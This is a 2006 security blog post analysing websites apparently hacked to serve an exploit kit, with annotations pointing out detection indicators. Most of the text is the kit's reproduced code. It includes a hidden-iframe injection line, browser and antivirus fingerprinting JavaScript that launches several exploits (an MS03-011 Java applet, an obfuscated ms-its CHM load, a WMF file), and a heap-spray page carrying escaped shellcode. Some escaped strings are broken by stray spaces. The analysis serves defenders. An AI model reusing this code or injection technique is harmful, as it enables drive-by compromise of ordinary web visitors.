Monday, April 17, 2006

Malicious site? or hacked site?

At-risk user behavior, or innocent user behavior?

2hjb.net downloads ms0311.jar, which includes Installer.class, which includes an exploit of the vulnerability addressed by Microsoft security bulletin MS03-011 (the Microsoft Java Virtual Machine security update).

www.2hjb.net/ms0311.jar (Installer.class) JAVA_BYTEVER.BE
www.2hjb.net/ie0604.htm
www.2hjb.net/cgi-bin/ie0604.cgi?bug=MS03-11&SP1

2hjb.net had been registered the day before. It is apparently a Lithuanian
job placement company. Owned by Robin Lee of Emeryville, CA? This sounds
suspicious.

Similarly, lauritoandlaurito.com and telecarrier.es deliver ms0311.jar.

lauritoandlaurito.com/ms0311.jar (Installer.class) JAVA_BYTEVER.BE

Laurito & Laurito, LLC (Law firm specializing in foreclosures in Ohio.
Also one of Ohio's top real estate firms. Go figure.)

www.telecarrier.es/ms0311.jar (Installer.class) JAVA_BYTEVER.BE
www.telecarrier.es/ms0311.jar (TakePrivileges.class) JAVA_BYTEVER.BE
www.telecarrier.es/ie0604.htm
www.telecarrier.es/cgi-bin/ie0604.cgi?exploit=MS03-11

Telecarrier S.L. (Spain's telecommunications giant)

Similarly, the web site of "Performance Cycle of Colorado" (www[.]performancecycle.com) will connect to 66.36.240.109/ie0604.htm which kicks in 66.36.240.109/cgi-bin/ie0604.cgi?bug=0day&SP2 and 66.36.240.109/cgi-bin/ie0604.cgi?exploit=0day

66.36.240.109/cgi-bin/ie0604.cgi is something called "Web-Attacker Control panel". The prompt says "Please enter the password to access the statistics".

A person whose web site was similarly hacked reports that this code was added to their web page:

<iframe src='http://66.36.240.109/ie0601.htm' width=1 height=1></iframe>

It displays a page saying "under construction", which then redirects to an annoying little JavaScript window that locks up your browser.
I looked at the code of the 'Under Construction' page. It is as follows:

<HTML xmlns:IE>

<TITLE>Demo page</TITLE>

<HEAD>

<STYLE type='text/css'>

IE\:clientCaps {behavior:url(#default#clientcaps)}

</STYLE>

</HEAD>

<BODY onLoad="setTimeout('Run_BOF()',2000);">

<CENTER><H1>This site is under construction...</H1></CENTER>


<IFRAME name="StatPage" width=5 height=5 style="display:none"></IFRAME>

<IFRAME name="PageContainer" width=5 height=5 style="display:none"></IFRAME>

<DIV id="ObjectContainer"></DIV>

<IE:clientCaps ID="oClientCaps" />

<script type="text/javascript" language="JavaScript">



// Selector for the second switch further down (0 = nothing is launched, the
// switch's default branch). Set by the OS / JVM / antivirus fingerprinting
// below and read again by Run_BOF(), which only acts when it equals 4.
var ExploitNumber=0;



// Asks the IE-only clientCaps behavior (the <IE:clientCaps ID="oClientCaps">
// element declared above the script) for the version of the component
// identified by CLSID. Returns the version string split on "," into an array,
// or [0,0,0,0] when the component is not installed. The callers compare
// element [0] against 0 and element [2] against 3810, and the author's own
// "5.0.3810.0" comment suggests element [2] is the build number.
// NOTE(review): the two calls use different id-type strings, "Component ID"
// and "ComponentID " (trailing space); whether IE tolerates both cannot be
// verified from this page.
function GetVersion(CLSID)

{

if (oClientCaps.isComponentInstalled(CLSID,"Component ID"))

{return oClientCaps.getComponentVersion(CLSID,"ComponentID ").split(",");}

else

{return Array(0,0,0,0);}

}


// Maps the platform token inside IE_vers (the caller passes
// navigator.appVersion) to a short Windows label used as the switch key
// below. When none of the substrings match the function falls off the end and
// returns undefined, which lands in the switch's "default" branch.
// The return statements have no semicolons and rely on automatic semicolon
// insertion.
function Get_Win_Version(IE_vers)

{

if (IE_vers.indexOf('Windows 95') != -1) return "95"

else if (IE_vers.indexOf('Windows NT 4') != -1) return "NT"

else if (IE_vers.indexOf('Win 9x 4.9') != -1) return "ME"

else if (IE_vers.indexOf('Windows 98') != -1) return "98"

else if (IE_vers.indexOf('Windows NT 5.0') != -1) return "2K"

else if (IE_vers.indexOf('Windows NT 5.1') != -1) return "XP"

else if (IE_vers.indexOf('Windows NT 5.2') != -1) return "2K3"

}



// Stage for ExploitNumber 4. It is scheduled twice with a 2 s setTimeout: once
// from BODY onLoad (before the fingerprinting has necessarily run) and again
// from case 4 of the launch switch. It does nothing unless the fingerprinting
// selected 4; otherwise it focuses the window and uses document.writeln() to
// add four hidden 1x1 iframes loading pluginst.htm and one loading
// ie0601d.htm. Because this runs after the page has loaded, document.writeln()
// replaces the current document contents.
// The loop index i is assigned without var and so becomes an implicit global.
function Run_BOF()

{

if (ExploitNumber==4)

{

self.focus();

for (i=1 ; i <=4 ; i++)

{

document.writeln('<iframe width=1 height=1 border=0 frameborder=0 src="pluginst.htm"></iframe>');

}

document.writeln('<iframe width=1 height=1 border=0 frameborder=0 src="ie0601d.htm"></iframe>');

}

}



// Beacon / payload-dispatch endpoint on the control-panel host.
// NOTE: as printed in the post the string literal is broken across two lines
// (the URL begins on the following line); almost certainly a line-wrapping
// artifact of the blog, left untouched here.
var CGI_Script="
http://66.36.240.109/cgi-bin/ie0601.cgi";



// Browser dispatch: IE is fingerprinted and served a stage; Netscape-family
// browsers only send the beacon (Firefox additionally gets mfsa0601.htm);
// anything else only sends the beacon.
// Many of the names assigned below (Click_Request, j, FullVersion, PatchList,
// ServicePack, the f* flags, Trojan_Path, CHM_base, Protocol, Init_String,
// oMSITS) are assigned without var and become implicit globals.
if (navigator.appName=="Microsoft Internet Explorer")

{

// Statistics beacon URL (cf. the "statistics" password prompt on the control
// panel); service-pack tokens are appended to it below.
Click_Request=CGI_Script+"?click";

// Directory of the current page; reused later as the applet codebase and the
// CHM location.
var InetPath=document.location.href;

j=InetPath.lastIndexOf('/');

InetPath=InetPath.slice(0,j);



var IEversion=navigator.appVersion;

var IEplatform=navigator.platform;

// Everything from here on is Win32-only.
if (IEplatform.search("Win32") != -1)

{

var WinOS=Get_Win_Version(IEversion);

// clientInformation.appMinorVersion is treated as a ';'-separated list; every
// entry containing 'SP' is reported to the control panel as "&SP..." (this is
// the "&SP1" / "&SP2" seen in the ie0604.cgi URLs quoted in the post).
FullVersion=clientInformation.appMinorVersion;

PatchList=FullVersion.split(";");

for (var i=0; i < PatchList.length; i++)

{

ServicePack=PatchList[i];

j=ServicePack.indexOf('SP');

if (j != -1)

{

ServicePack=ServicePack.substr(j);

Click_Request=Click_Request+'&'+ServicePack;

}

}

// Fire the beacon by navigating the hidden StatPage iframe.
StatPage.location=Click_Request;

// Fingerprint the Microsoft JVM and IE through their clientCaps CLSIDs;
// GetVersion() returns [0,0,0,0] for a component that is not installed.
var JVM_vers = GetVersion("{08B0E5C0-4FCB-11CF-AAA5-00401C608500}");

var IE_vers = GetVersion("{89820200-ECBD-11CF-8B85-00AA005B4383}");

// fNortonAV / fMcAfee: whether the vendor ActiveX controls instantiate.
// XP_SP2_patched: set from PatchList in the "XP" case below.
fNortonAV=0; fMcAfee=0; XP_SP2_patched=0;

// Antivirus detection by probing: new ActiveXObject() either succeeds (control
// present) or throws (absent), so the empty catch blocks are the mechanism,
// not a mistake. A web page has no legitimate reason to instantiate these
// ProgIDs, which makes them a usable content signature for this kit.
try

{

var oNortonAV=new ActiveXObject("NAVCfgWizDll.NAVCfgWizMgr"); //Norton Antivirus Config Wizard initialization

fNortonAV=1;

}

catch(e){}

try

{

var oMcAfee=new ActiveXObject("McGDMgr.DwnldGroupMgr"); // McAfee Security Download Control initialization

fMcAfee=1;

}

catch(e){}


// First switch: pick ExploitNumber from Windows version, JVM build and AV
// presence. The recurring pattern: an old JVM (element [2] below 3810) gets
// stage 1; when either AV control is present the choice moves away from
// stage 3 (the pop-up) or 5 (the WMF) to stage 2 or 4.
switch (WinOS)

{

case "2K":

if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))

{ ExploitNumber=1; }

else // if JVM = 5.0.3810.0 or higher

{

if ((fNortonAV==0)&&(fMcAfee==0))

{ ExploitNumber=3; }

else

{ ExploitNumber=2; }

}

break;

case "2K3":

if ((fNortonAV==0)&&(fMcAfee==0))

{ ExploitNumber=3; }

else

{ ExploitNumber=4; }

break;

case "XP":



if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))

{ ExploitNumber=1; }

else // if JVM = 5.0.3810.0 or higher

{

// Second pass over PatchList (reuses var i) looking for an exact "SP2" entry.
for (var i=0; i < PatchList.length; i++)

{

if (PatchList[i]=="SP2")

{ XP_SP2_patched=1; }



}

if (XP_SP2_patched==0)

{

if ((fNortonAV==0)&&(fMcAfee==0))

{ ExploitNumber=3; }

else

{ ExploitNumber=4; }

}

else

{

if ((fNortonAV==0)&&(fMcAfee==0))

{ ExploitNumber=5; }

else

{ ExploitNumber=4; }

}

}

break;

// Covers 95 / 98 / ME / NT and an undefined WinOS (no substring matched).
default:

if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))

{ ExploitNumber=1; }

else

{ ExploitNumber=2; } // if JVM = 5.0.3810.0 or higher



break;

}

// Second switch: launch the stage selected above. Every case loads a further
// file relative to InetPath or CGI_Script, so the file names (ie0601a.jar,
// ie0601b.chm, ie0601c.htm, ie0601d.htm, ie0601e.wmf, pluginst.htm,
// mfsa0601.htm) and the "?exploit=" / "?click" query strings are what to
// search for in proxy and web-server logs.



switch (ExploitNumber)

{

// 1: Java applet (TakePrivileges.class, the same class name flagged in the
// ms0311.jar samples listed in the post) with the CGI "exploit=MS03-11" URL
// handed in as its ModulePath parameter.
case 1:

Trojan_Path=CGI_Script+"?exploit=MS03-11";

ObjectContainer.innerHTML='<applet archive="'+InetPath+'/'+'ie0601a.jar" codebase="'+InetPath+'" code="TakePrivileges.class" width=1 height=1><param name="ModulePath" value="'+Trojan_Path+'"></applet>';

break;

// 2: the protocol prefix is %-escaped purely to hide it; unescape() yields
// "ms-its:mhtml:", so the OBJECT's data URL addresses main.htm inside
// ie0601b.chm reached through an MHT path. An unescape() of a URL scheme is
// itself a good indicator when scanning page content.
case 2:

CHM_base='//ie0601b.chm'+'::'+'/main.htm';

Protocol=unescape("%6ds-i%74s:%6dh%74%6dl:");

Init_String=Protocol+'file://'+'C:\\MAIN.MHT!'+InetPath+CHM_base;

oMSITS=document.createElement("<OBJECT data='"+Init_String+"' type='text/x-scriptlet'></OBJECT>");

document.body.appendChild(oMSITS);

document.title="Loaded !";

break;

// 3: a 50x50 window placed at 2000,2000 (off-screen on most displays) loading
// ie0601c.htm, then refocus the main window. The stray spaces inside the
// feature string ("top=20 00", "sc rollbars", trailing "status=0 ") look like
// wrapping artifacts of the post.
case 3:

window.open("ie0601c.htm","Info","left=2000,top=20 00,screenX=2000,screenY=2000,width=50,height=50,sc rollbars=1,menubar=0,titlebar=0,toolbar=0,status=0 ");

self.focus();

break;

// 4: delayed Run_BOF() (defined above). The leading ';' is an empty statement.
case 4:

;setTimeout('Run_BOF()',2000);

break;

// 5: loads a WMF image into the hidden iframe; selected only for XP with SP2
// and neither AV control present.
case 5:

PageContainer.location="ie0601e.wmf";

break;

default:

break;

}


}

}

// Netscape-family browsers: beacon, then Firefox gets mfsa0601.htm.
else if (navigator.appName=="Netscape")

{

StatPage.location=CGI_Script+"?click";

if (navigator.userAgent.indexOf('Firefox') != -1)

{

PageContainer.location="mfsa0601.htm";

}

}

// Any other browser: beacon only.
else

{

StatPage.location=CGI_Script+"?click";

}

</script>

</BODY>

</HTML>




The page it redirects to (for me, anyhow) has code as follows:



<HTML><HEAD><SCRIPT language="javascript">

// Page reached from the dispatcher above (run 2 s after BODY onload). It
// builds one very large string and passes it as the message of prompt():
//   eip            - "%u7030" + "%u4300" decoded and appended 500 times
//   mem_block      - eip appended 200 times, i.e. 100,000 copies of the
//                    two-character pattern (roughly 400 KB of UTF-16 data)
//   full_shellcode - two %u-escaped literals decoded with unescape() and
//                    concatenated, then appended to mem_block
// The variable names state the author's intent; what the prompt() call
// actually achieves in a given browser cannot be determined from this page -
// the post only reports that the window locks up the browser.
// Detection notes: long %u-escaped literals fed to unescape(), nested
// string-doubling loops, and a prompt()/alert() with an enormous argument are
// recognisable content indicators for this family.
// NOTE: both escaped literals below contain stray spaces inside "%u" sequences
// (wrapping artifacts of the post), so as printed unescape() would leave
// those fragments undecoded.
function SpreadShellCode() {

var i = 0;

var eip = "";

var mem_block = "";

for (i=1 ; i <=500 ; i++)

{eip = eip + unescape("%u7030")+unescape("%u4300");}

var init_shellcode = "";

var main_shellcode = "";

var full_shellcode = "";

for (i=1 ; i<=200; i++)

{mem_block = mem_block + eip;}

init_shellcode=unescape("%u9090%u9090%u9090%u42ba% u4241%u8141%u11f2%u1111%u4111%u1139%ufb75%uf18b%uf 88b%u3357%u66c9%u25b9%ufc01%ua4f3%uff5f%u90e7");

main_shellcode=unescape("%u5053%u5053%u3390%u33c0% uebc9%u5e12%ub966%u0103%ufe8b%u2e80%u8005%u0336%ue 246%uebf7%ue805%uffe9%uffff%u5ced%u7b8d%u8d44%u327 c%u0580%u5afb%u7a8d%u0528%u35fb%u4fcf%ub347%udd35% u113a%u1cc2%u4030%u7cf6%uc710%u13cd%ude05%ued48%u3 df1%u7be1%u62e9%u628d%u052c%u6ae3%u148d%u8d4d%u246 2%ue305%u0c8d%u058d%uc5cb%u565b%u5354%u5251%u4c32% u5454%u4508%u643e%u3279%u806b%u086b%uc835%u056c%u3 848%u1480%u488d%u8d14%u2478%u8db3%u1048%u0fed%u488 d%u933c%u8448%u488d%u9b44%u92c1%u1252%uf0f4%u018c% u0101%uf485%u850c%u2c34%u0144%u9bd8%uc158%u1e3a%u7 831%u71f0%u0101%u8d01%u2c5c%u9304%ube56%udd35%u555 5%ued56%u552c%ud801%uc163%u02a0%u128e%u55f0%u0101% u8501%u0cf4%u3485%u662c%ud801%u82c1%ue6e0%uf075%u0 148%u0101%u0156%uf0d8%u01d9%u0101%u7c70%u787c%u313 e%u3a31%u323a%u3a35%u3632%u383c%u3732%u3f38%u6531% u6f69%u6633%u726f%u6f31%u386b%u383a%u3237%u6965%u4 16f%u806b%u7478%u6f71%u437c%u5553%u3b38%u3833%u3c3 b%u0008");

full_shellcode = init_shellcode+main_shellcode;

mem_block = mem_block+full_shellcode;

// prompt(message, defaultValue): the huge string is the dialog's message text.
prompt(mem_block,"Javascript initialized");

}

</SCRIPT></HEAD>

<BODY onload="setTimeout('SpreadShellCode()',2000)"></BODY></HTML>





These web sites were probably compromised (hacked) rather than malicious by design.